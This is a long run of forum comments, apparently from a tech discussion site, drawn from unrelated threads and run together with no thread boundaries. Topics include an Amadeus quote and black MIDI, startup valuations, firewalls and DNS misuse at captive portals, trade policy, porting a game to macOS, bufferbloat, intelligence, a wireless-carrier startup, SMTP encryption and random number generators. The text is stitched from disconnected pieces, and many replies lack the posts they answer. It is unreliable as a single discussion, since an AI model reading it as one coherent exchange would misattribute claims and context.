EMPEROR: Of course I do. It's very good. Of course now and then - just now and then - it gets a touch elaborate.
MOZART: What do you mean, Sire?
EMPEROR: Well, I mean occasionally it seems to have, how shall one say? [he stops in difficulty; turning to Orsini-Rosenberg] How shall one say, Director?
ORSINI-ROSENBERG: Too many notes, Your Majesty?
EMPEROR: Exactly. Very well put. Too many notes.
MOZART: I don't understand. There are just as many notes, Majesty, as are required. Neither more nor less.
EMPEROR: My dear fellow, there are in fact only so many notes the ear can hear in the course of an evening. I think I'm right in saying that, aren't I, Court Composer?
SALIERI: Yes! yes! er, on the whole, yes, Majesty.
MOZART: But this is absurd!
This certainly is an interesting area to explorer musically. Want can we do with a piano if we had more than ten notes to play at a time. Right now it is HOW many can we play and still sound musical from the samples I saw.
If you are reading this comment watch this [Black MIDI] Synthesia "Nyan Trololol" | Rainbow Tylenol & Nyan Cat Remix ~ BusiedGem
You are welcome ;)
Not that there is anything wrong with noise. As a fan of CCCC (Mayuko Hino), I have often thought noise is best when it is played directly (analog), instead of the digital perfection of MIDI. I like my digital noise when it's written in Fourth.
 http://pelulamu.net/ibniz/ warning: turn down the volume - raw square waves at the beginning!)
I've been legitimately impressed by the abilities of certain artists to really push the boundaries and limits - in my opinion - of packing in musicality in the D&B platform. One I can point to would be Camo & Krooked. Another that sort of crosses into bass music would be Knife Party. What they have in common, to my ears, is that they're able to embrace the full spectrum of available sounds. High peaks and really, really deep bass. Then, with so much digital control, they can go up and down, place certain sounds in certain tonal areas...it's just amazing to me.
One of the things that infuriates me about music commentary is the tired refrain of "rock is dead" or "music isn't original anymore" because frankly, they're not true. Rock continues to be a broad genre, and I really see electronic-production tunes like Skrillex an extension of rock and metal in that it appeals to a younger audience (predominately) and is very abrasive to 'traditional' ears.
Music is really going through a metamorphasis of innovation thanks to software like Ableton and the numerous brilliant synths out there. It's one thing to say "I don't like that music" but it's completely dishonest to say nothing's original anymore. Yes, there will always be 'trend jumpers' and some formulaic stuff (it goes for all genres, and specifically anything Max Martin touches), but now and then, BAM. Something shows up and moves the needle.
 Camo & Krooked - Let's Get Dirty - https://www.youtube.com/watch?v=IL5H38bpvFA
 Knife Party - Resistance - https://www.youtube.com/watch?v=DwqUGkR9yh8
(To clarify - I feel the clip from Amadeus is somewhat amusing in this context, but to those who critique black midi as music, I don't think it is really ... it's art).
A gold rush for good startups I think.
The returns from sitting the right group of people in a room and getting them to make doing something a few orders of magnitude better than it was before are still going to be huge.
My point is that arguing that people have said this bubble was about to burst and that it hasn't yet isn't an argument that it won't.
Pegasus (n) 1. Mythical winged horse; 2. Silicon Valley 'unicorn' with high gross margin. i.e. one that might actually take off.
To be fair, I think these markdowns have more to do with who is investing than the companies themselves.
VC's do portfolio valuations much less frequently than mutual funds, PE firms or hedge funds do and they give less negative scrutiny to the valuation than the aforementioned firms do, the reason for this....
... is VC firm's typically don't allow redemptions on monthly intervals which means they can keep an unrealistic valuation for longer where as Hedge funds, PE firms and mutual funds, who typically allow monthly redemption, need to properly value each holding at the end of each month.
I mean if you are a VC, do you care if you don't write down Snap-chat at the end of the month, you really have no incentive to do so?
You get paid on a quarterly basis on the size of your portfolio, why mark it down until you are absolutely certain that it needs to be marked down, this point is usually not until you actually go to sell, be it IPO or private equity deal.
However, if you are a hedge fund and someone wants to redeem their assets, you want to make sure you value Snap-chat for what you can realistically sell if for as that's essentially what you are doing when you allow someone to redeem their funds from your firm.
With people pulling money out of hedge funds, and PE firms on a monthly basis, this makes you have to pay attention to valuations on a much more granular time frame than historically VC firms would have.
>To summarize: there does not appear to be a tech bubble in the public markets. There does not appear to be a bubble in early or mid stages of the private markets. There does appear to be a bubble in the late-stage private companies, but thats because people are misunderstanding these financial instruments as equity. If you reclassify those rounds as debt, then it gets hard to say where exactly the bubble is.
>At some point, I expect LPs to realize that buying debt in late-stage tech companies is not what they signed up for, and then prices in late-stage private companies will appear to correct. And I think that the entire public market is likely to go downperhaps substantiallywhen interest rates materially move up, though that may be a long time away. But I expect public tech companies are likely to trade with the rest of the market and not underperform.
Also, the decaying state of physical infrastructure in the U.S. is only going to drive more people to spend time on the Internet, where network effects are only getting exponentially more powerful as new networks are getting built on top of existing networks. These days a social startup that's "only growing as fast as Facebook" might not even be able to successfully raise a seed round. There might be a cyclical downturn, but none of the underlying trends in society point to tech being a bad investment over the longterm.
So what we're seeing is that people are starting to re-think valuations in the face of these preferences.
The current state of highly educated people looking for get rich quick schemes (unicorns) is tiresome.
Next up: The next [pick top product] killer! you won't believe how [pick new or underdog product] is going to completely replace [pick top product] due to it's [pick random feature in [pick new or underdog product]]
Any captive portal these days block also ICMP.
Most firewalls block ICMP these days, because the days of blacklisting are over and ICMP is not the one who is getting white listed. Why?
The only way these days is to misuse DNS. But even that works less and less reliable.
Is there anyway to stop things like this at the corporate firewall?
Apart from the problems with Windows, npm, and path lengths.
It's been changed now, but originally was titled "10 Habits of a Happy Node Hacker (2016)"
The problem now is that there is JUST SO MUCH metadata that it is losing that distinction. If someone calls a known pot dealer once a week, then it doesn't matter whether you hear the call or not, you can still infer that the caller picks up every week.
A DOJ lawyer once said to me that "when survellience is ubiquitous, the role of law enforcement becomes the role of a prison warden, where everyone is an infraction waiting to happen."
The only reason its not a bigger issue right now isn't because "nobody cares, privacy is dead!". It's because people for the most part do not understand the mechanism.
Explain exactly how ads track you to common people, just how many do you suppose will approve and be comfortable with the arrangement?
The entire industry is built on sand.
"Of the 30 chapters of the TPP, there are only 6 that have to do with traditional trade issues the rest have to do with "behind the border" policies, which are basically our laws In the text, we see an expansion of the failed model, under NAFTA, that pits US workers against workers in other countries, this time in Vietnam where workers earn 65 cents an hour, as well as other countries such as Malaysia which has a huge problem with human trafficking modern-day slavery we are very concerned that this continues that race to the bottom it leads to an overall depression of wages and an increase of income inequality in the U.S.
It's a trade of industries: we are going to favor our pharmaceutical manufacturers, certain content producers receive favorable status while giving up other industries."
If only we could fashion trade agreements to lift all boats, removing tariffs only when the production of a product is ecological and societally sustainable.
What came out of that, it appears to me, is a booming software industry with more local competent and confident software engineers.
I am for reaching a economic global optimum.
I think this already sort of exists somewhat. If my close relatives, manufacture something, I gladly buy their goods over those of their competitors because yes, I am paying more but the money is supporting my uncles, nephews and nieces. I think that's a net positive for me. They reciprocate the favour. As a family we are wealthier than we would be otherwise because, no, they cannot abandon their business and start new businesses just so they could take advantage of competitive advantage. That is unrealistic. They know only one market well enough and do not have the resources or guidance to get into a completely different market.
I guess the Amish are another example of this and I believe Israel's Kibbutz aswell.
Protectionism and "Buy American" is fundamentally incompatible with affordable consumer goods. Hoffa's way will lead to you only being able to afford a new smartphone once every 20 years. Televisions will become family heirlooms because you just can't afford to buy a new one. Hope you like the outfit you're planning on buying, because you're going to be wearing it for years.
I value the modern American lifestyle.
Back in the day I did most of my dev work on Solaris. I then spent 4 years as CTO as a startup that was pretty much only Windows.
When I subsequently went back to working at a unix shop I was initially struggling with vi as I tried to read some of the C++ code. I couldn't remember commands, was having to refer to the man pages every few mins. It was torture.
A couple of days in, I was writing up some notes in vi when someone walked past my desk and started chatting. When we finished talking I looked down at the monitor and I'd written more than I had when I was concentrating, nicely formatted, the works. Turns out "my hands" had remembered a load of what I thought I had forgotten.
For the next few days I had to keep finding ways to distract myself so that I could work efficiently. Eventually it all came to the foreground but it was the most bizarre experience while it was happening.
Once start working on Linux port he'll regret about that. Every developer that start with own platform-specific code end up using SDL2 anyway. Don't do that mistake.
I wish the author told me more about it than just this. Can somebody comment on how it compares to recent VS editions these days? About 5 years ago I also looked into using OSX as main OS. As I've always been using non-commandline graphic text editors and IDEs for most coding that made XCode the go-to environment but I just couldn't deal with it even though I tried. I don't remember all details but in general it just felt inferior to VS on like all fronts, with no advantages of any kind (for C++). Again, IIRC, but it did annoying things like opening the same document in multiple windows, one for editing and one for debugging or so? Anyway, what's the state today?
Anyway, I don't really care anymore, I bought a thinkpad instead. Cocoa is just something I just can't even.
My experience has been pretty different. I'm not a professional developer though.
OpenGL on multiple monitors - this was much more difficult to do on MacOS. I had to create a separate window for each monitor, create a rendering context for each window, make sure my graphics code was issuing the drawing commands to the proper context, then have each context queue/batch "pending" rendering commands and issue them all at once at the end of a frame on a by-context basis. Whereas on Windows you can pretty much create a window that spans multiple monitors and draw to it with a single rendering context.
Input - I used DirectInput on Windows and wrangled a suitable implementation using HID Utilities on Mac, which was not easy given my lack of previous USB programming experience. A major annoyance was the lack of a device "guid" that you can get via HID Utilities to uniquely identify an input device - I had to manually contruct one using (among other things) the USB port # that the device was plugged into. Not ideal.
SSE intrinsics - my experience was that Microsoft's compiler was MUCH better at generating code from SSE/SSE2 intrinsics then clang - my Windows SSE-optimized functions ran significantly faster then my "pure" C++ implementations, where as the Mac versions ran a bit slower! My next thought was to take this particular bit of code gen responsibility away from clang and write inline assembly versions of these functions, but I took a look at the clang inline assembly syntax and decided to skip that effort. (I did write an inline assembly version using the MS syntax and squeezed an additional 15% perf over the MS intrinsic code.)
Prtty much everything else (porting audio from DirectSound to OpenAL, issuing HTTP requests, kludging up a GUI etc) was pretty straight forward/did not have any nasty surprises.
What can make such considerable difference?
It took two weeks to get the code compiling and running. That turned out to be the easy part. Getting the application performing well, feeling "native", and getting the bug count down took another six months.
I love Banished and I'd like to see a completed OS X port. But I'm not expecting this to be done, like, tomorrow!
Not just unix-like, OS X is certified UNIX.
OpenGL on OS X is still behind the times, and so far it's not even clear if Apple will add Vulkan support when it will come out.
To this day I still don't see or find how it is useful.
The code that is completely different on the platforms is stuff like HTTPS requests, open file dialog, create/delete folders.
Did the author buy a MacBook Pro just for this purpose? I'd assume this is his personal laptop, but his "Using a Mac" section sounds like he's not a Mac user even in his free time.
First make the iOS version. Then, port it over to Java. Then, port it over to C# or maybe ActionScript3/Flash.
This way, I can recursively update previous versions as the 'best solution' to interesting problems become most clear by the end of the 2nd or 3rd port. This gives the Objective-C/iOS version the attention it needs, and I can use the rapid application development features for each new port.
Most of these had to do with templates that expected the code inside them not to be compiled until they were instantiated. The Microsoft compiler has that behavior, while clang does not.
Where would one have to hide to retain this level of ignorance for so long?
QUIC uses fundamentally the same basic congestion avoidance algorithm as TCP (QUIC's algorithm is a work in progress AFAIK) so even QUIC is still in the same bloat.
The problem eventually bubbles up the stack and affects most web applications, so that a single user, just using a web application on one machine, can break the Internet for all other users on the same LAN.
Try this demo for yourself:
1. Run "ping google.com" from another computer on your LAN.
2. Upload a 10-20MB file via Gmail or Dropbox from your computer.
3. Watch the ping times on the other computer skyrocket from around 100ms to upwards of 5-10 seconds.
4. Try a Google search from any other computer on your LAN while this is happening.
Web applications which use protocols such as WebSockets have no way to reduce the bufferbloat footprint of their application, other than re-implement their own delay sensitive congestion avoidance algorithm on top. And actually, if you want to build a robust application which does any uploading (or plenty of downloading), this is what you need to do.
For example, to prevent inducing bufferbloat, Apple's software update actually uses a variant of LEDBAT (the delay sensitive congestion avoidance algorithm from BitTorrent's protocol) when downloading software updates.
In my spare time I'm a contact juggler. If you don't know what that it is, it involves rolling balls around the body. David Bowie in Labyrinth is usually a good reference point.
And I'm good at it. I'm good at it because I've been doing it for nearly a decade and I've put in the hours. I don't think I learned particularly quickly, or even particularly well, but I stuck with it and worked hard to improve. I'm not shy about telling people that, but many still seem to assume it's some form of innate talent, no matter how much I reassure them otherwise.
It's as though people would rather accept their own status quos rather than believe that effort and commitment is enough to improve their lot. Yes, it might take years to reach a level of skill in a given discipline, but those years will pass anyway. Wouldn't it be nice to have something more to show for all that time than a depression on the sofa in front of the tv?
I have no CS degree but have elbowed my way (often with a distinct lack of grace, in retrospect) into the industry as a software developer. I now somehow work at a place that prides itself on intense meritocracy, famous for its grueling elitist interviews .... and the impostor syndrome is intense. But when I look around, most of the people around me do not seem so much 'more intelligent' as 'more adapted for the school-grades / work-politics system' which the interview process / promo process selects for.
To me intelligence and smartness are clearly cultural phenomenon. Yes some people are more adapted to certain types of intellectual activity, but whether those things are 'smart' or not is questionable to me.
As a parent I often get frustrated with myself when I instinctually reward my children with comments like "you're so smart". Unfortunately they struggle with focusing, behavioural compliance, etc. in similar ways to me, while their intellectual and artistic curiosity is intense -- I know they have a long uphill battle ahead of them.
The older I get, the more wise I get, the more I believe in the above statement. As in, not having the mental capacity or brain-power to muse over inequities both in personal and worldly topics is a less emotionally affective position to be in. I grew up in a protestant Christian faith, and while I don't actively participate, I do reflect often on some of the teachings (mostly the Beatitudes) and literature, and only in my 20s did I realize that "Eating the apple from the tree of life" is pretty much a metaphor for our evolutionary development into consciousness, of "knowing right and wrong" as a species.
Intelligence? It's a curse as much as it is a blessing. Folks can disagree with that assertion if they'd like. From my personal studies in literature and philosophy though, I think it's a pretty common understanding amongst a certain tier of thinkers. My apology if I come off sounding a little elitist, but intelligence is a bell curve, and, to quote the famous Demotivational poster, "Not everybody gets to be an astronaut when they grow up."
Link to photo I found via Google search: http://cdn.shopify.com/s/files/1/0535/6917/products/potentia...
Its a #1 Best-Seller on Amazon:http://www.amazon.co.uk/Outliers-Story-Success-Malcolm-Gladw...
Then there is also the impostor syndrome, many students are likely to feel not smart enough.
And then there is the cultural taboo around smartness. Taking pride in ones ability is socially accepted as long as that ability is not intellectual. So in a way idea like this turns into twisted logic: "I'm smart, my laziness in college shows it." And now you get to do that sweet guilt tripping for feeling too smart. There is difference between pride and arrogance. So this self deprecation seems bit needless.
What if we don't consider pride as a sin, but as natural phenomena in range of human emotion. Maybe pride is inevitable for ego? Now if that is true, what should a good student to be proud of? What if being openly proud of your intellect is healthy after all?
On the other hand I also have heard from many that grad school is the first time many students have to see a therapist and deal with depression.
I like the analogy that things are "muscles". It concisely captures various phenomena that I've observed: the brain is a muscle, willpower is a muscle, trust (in another person) is a muscle ...
This seems like such an empowering way to look at learning, and one I think many of us are prone to forget. Even masters don't just arrive at their talent, they too have to work at it, over and over, day after day.
It seems timezones matter a lot. :)
People talking about budgets and fiscal planning making use of hi-tech specific, bio-tech, etc. Anything which passively indicates that they are up to date on cant and argot of totally unrelated fields but serve as signal of being at the edge or on the cusp of all things new and modern and professional.
Examples, using MM for millions, or K for thousands (is that metric K or computing K), or saying "spend" as a noun. Having to sound like one knows and is up to date with all the different industry terminologies must be taxing.
Best of all is when a person is actually familiar with the terminology and senses the forced nature of the out of context use. They can only smile at the stilted use.
It's a lot of text in comparison to the original poster-comic and a lot of stuff seems very repetitive (it's bound to be, right?) since many principles of planes, submarines, rockets are the same (physics). Still a fun read if you don't plow through it in one sitting.
Edit: He's taken the common word list and added different forms as he needed them. Go -> goer and goers, because he wanted to use them. Grow is allowed, but grower and growers are not, because he didn't need them.
Unless they have some game changing wireless technology than I don't see it happening and investors may as well put their money down a black hole.
BI says "Part of his plan involves installing microcells in customer's homes to blanket the nation, but also making it as easy as buying a cellphone to sign up for it. Another key to the plan is a portfolio of zero-rated apps that won't cut into your data, Palihapitiya said."
^That does not sound like a very good plan. Carriers like AT&T and T-mobile already have microcell options, and most people won't opt for it especially if other people get use the microcell at the cost of the person's personal bandwidth with their ISP.
What is Zero-rated apps? Isn't it similar to what T-mobile is already doing with their video and audio streaming; whitelisting Apps that will not count against data. Most carriers also have WIFI calling.
That auction that he wants to participate in, isn't that for low band spectrum like 600Mhz. That is good of extending coverage but will not increase your download speeds. Carriers like to have both low band and high band.
Best of luck, Chamath.
But it would hardly help him "overtake" AT&T and Verizon with no network and probably only 10-20MHz of spectrum, possibly missing large markets like New York and San Francisco entirely due to the high price licenses in those markets fetch.
The auction is generally seen as most beneficial to T-Mobile who has a network, but lacks low-frequency spectrum in a lot of markets.
There have been many companies that have dreamed of entering the US wireless business. Many have bought spectrum only to let it languish for years and then sell it to an incumbent carrier. Looking at 700MHz-A licenses, a lot of them are owned by companies such as "C700-Salt Lake City-A LLC", "C700-Jacksonville-A LLC", "Cavalier Louisville, LLC", and "Cavalier Albany NY, LLC". Part of the issue is that it is expensive to build out a wireless carrier requiring lots of money and consumers demand a high level of perfection when it comes to their wireless carriers. The American market isn't one that tolerates even small carrier issues.
Some of it will depend on what licenses go for. I think most people are expecting licenses to run T-Mobile in the range of a couple billion given the 30MHz set aside, but T-Mobile is planning for up to $10B. Verizon just paid around $10B for around 10MHz of AWS-3 spectrum and the 600MHz licenses are a lot more valuable. But 30MHz is set aside with less competition from the big two.
Given that the licenses will likely cost $2B+ and cap-ex can often run $3-8B per year for carriers, $4-10B seems a little low to launch a compelling service. Part of the issue with the US is that it's such an expansive place and people don't want to be told "this service is only available in Maryland, DC, and Northern Virginia".
I guess the question is: what does he think he can do better. If it's cost, I can get 2-5GB of data with unlimited talk and text from Boost for $30/mo, taxes and fees included, on Sprint's nationwide network. His network will be worse than Sprint's so how much of a discount can he offer off $30 to make a much worse, completely new network compelling? He won't have loads of spectrum to offer really high data caps. And if he starts offering 100GB for $25, that will have to come down fast as people start actually using it and the network becomes capacity constrained. And customers are very used to being grandfathered into plans in wireless. If he were just competing against AT&T and Verizon, he might have an opening. But even AT&T has their Cricket brand where I can get 2.5GB for $35, taxes and fees included, on AT&T's network.
The question is: what does his entry bring to the scene? It seems unlikely that he can greatly undercut prices. It seems unlikely that microcells in people's homes will "blanket the nation". With so little spectrum compared to competitors, he won't be able to offer the speed and capacity they're offering. Without a reliable network, customers will want a steep discount to move to his service. So, how much below $30/mo can he go to grab customers? Is there something else compelling? T-Mobile already offers microcells for your home and zero-rates music and now video streaming.
I'm all for increasing competition. It just seems unlikely that this will increase competition. It seems way more likely that Dish will buy some 600MHz licenses and start rolling out a network. They already have substantial spectrum holdings and the low-frequency licenses would allow them to get broad coverage without spending too much while using their higher-frequency spectrum to supplement capacity where needed. Dish also seems to think that wireless data is going to be their salvation. As we inch closer to 5G, it's likely that fixed mobile broadband from an antenna in your home could serve as competition to wired internet services. That would allow Dish to offer on-demand services and home broadband plus mobile services in an era when more people are forgoing pay-TV services.
To me, that seems like something with a strong chance of happening. The company already has a huge spectrum investment and they need wireless for their future. Rama would be competing with way less spectrum and starting from scratch. Seems like a much easier way to be profitable would be to bid on the spectrum that AT&T and Verizon can't bid on, use the big FCC discounts for new players, hold it for 4-5 years, and then re-sell it for a profit.
I own a tiny bit of common stock in a private company (by way of ESOs), and I have a hunch that virtually all of the rest of the stock is in preferred shares of some sort. And thus I have no idea how much my stake is worth. For all I know, it's zero.
Shouldn't it count as some sort of securities/financial fraud to issue preferred shares of stock, and then to hawk the "market valuation" of the company as if you'd just sold common stock for the same terms?
"The caterpillar, instead of building its cocoon to guard itself at night, wraps it around the larval wasps (which previously tore their way out of its body), and will continue to defend them until it starves to death.
The biggest danger for these parasitic wasps is being injected with another species of parasitic wasp".
EDIT: Wow, what a cool site - crowdfunding experiments!
It seems surprising that this entire project was done with $4,500 of crowdfunding. That seems very cheap. I wonder how much of the project funding came from elsewhere.
More info: https://en.m.wikipedia.org/wiki/Leucochloridium_paradoxum
I didn't know this platform exists.
P.S: It's just a joke!
They must have better optimization a for running in production, such as in place operations.
The responses seem to show that the way you implement things can make a big difference in runtime. Perhaps the scripts used for benchmarking can be further optimized?
That said, the lack of in-place operations might be surprising (although it has been said that they are coming)
Regarding the issue with certificates for the servers that the MX points to, I disagree with the author.If the MX for example.com points to mail.example.info, it implies that example.com trusting the handling of its mail to mail.example.info, therefore there is no issue with letting mail.example.info present its own certificate.
The article also suggests that DNSSEC with DANE will solve all issues with SMTP encryption.
However, DNSSEC is a crappy standard. It doesn't do encryption so a surveillant can still collect metadata; it has unsolved issues that facilitate amplification attacks, it's overly complex and has slow adoption.In fact, before DANE arrived on the scene, there was hardly a good reason to deploy it.
If we adopt DNSSEC now we'll be stuck with it (including its lack of privacy) pretty much forever. Instead, I suggest we work on more promising initiatives such as DNSCurve (https://en.wikipedia.org/wiki/DNSCurve)
* TLS Wraper
* Secure Tunnel
And Amazon Web Services Simple Email Service accepts all three approaches. Granted the latter two may not be supported by a lot of providers, but hey is that the same thing with browsers securities? We deprecate old MTAs and old versions of them progressively. Just my two cents.
I predict in my group of friends I can receive/sent from/to almost everyone if I would enfore TLS on my server. Except to/from that one guy that is savvy enough to have his own domain but hosts his email at a cheap, crappy provider.
PGP and SMIME is perfectly fine for high security scenarios (whistleblowing and such), in other words for the 0.000001% use case.
For the 99.9% use case, all that regular folks need is for the sending MX to verify that the recipient MX owns the domain before delivery.
PGP and SMIME with their key-signing parties, government-owned PKI et cetera, is either wild overkill or so utterly complex that it defeats the purpose for the 99.9% use case.
That said, you are going to break some of my software with this.
Specifically a SMTP reverse proxy, that looks at the domain part of RCPT TO, and transparently forwards the SMTP connection to the correct customer's MX for processing.
It could easily be unbroken again - BUT that would require that Postfix get their software together and add SNI support to their TLS stack (like all? other MX software does).
1) Use RCPT domain-part for the SNI hostname.
2) Always try SMTPS port before SMTP port. Always try STARTTLS before plaintext.
3) Actually verify the certificate, duh.
4) Support a new EHLO header that mimics Strict-Transport-Security exactly.
I'm finding it quite difficult to read through the main page however, as there's something going on with the scrolling. It's hyper-sensitive, then when there are animations on the page they play through before jumping me really far.
And: The service looks nice - my way of asking questions does not imply a bad impression.
But the difference of Sodocan is that it then sends these JSON files to an API server, which hosts these documentations?
So basically instead of using JSDoc + static site generator, one would use this method?
And the benefit would be that the generated documentation would be crowdsourced?
Am I the only one, who cannot believe that websites made by (web)developers use scroll hijacking?
So along that line, the massive recent increase in high-sugar food/drinks and fast-food restaurants like McDonald's should be fueling another leap in brain size!
Not mentioning speed variability of ChaCha family is a flaw in analysis.
Also, does anyone know if PCG is in use somewhere today?
> No facility for a user-provided seed, preventing programs from getting reproducible results
> Periodically stirs the generator using kernel-provided entropy; this code must be removed if reproducible results desired (in testing its speed, I deleted this code)
seem like exactly the kinds of foot guns you really want removed from an RNG you're using for real live code.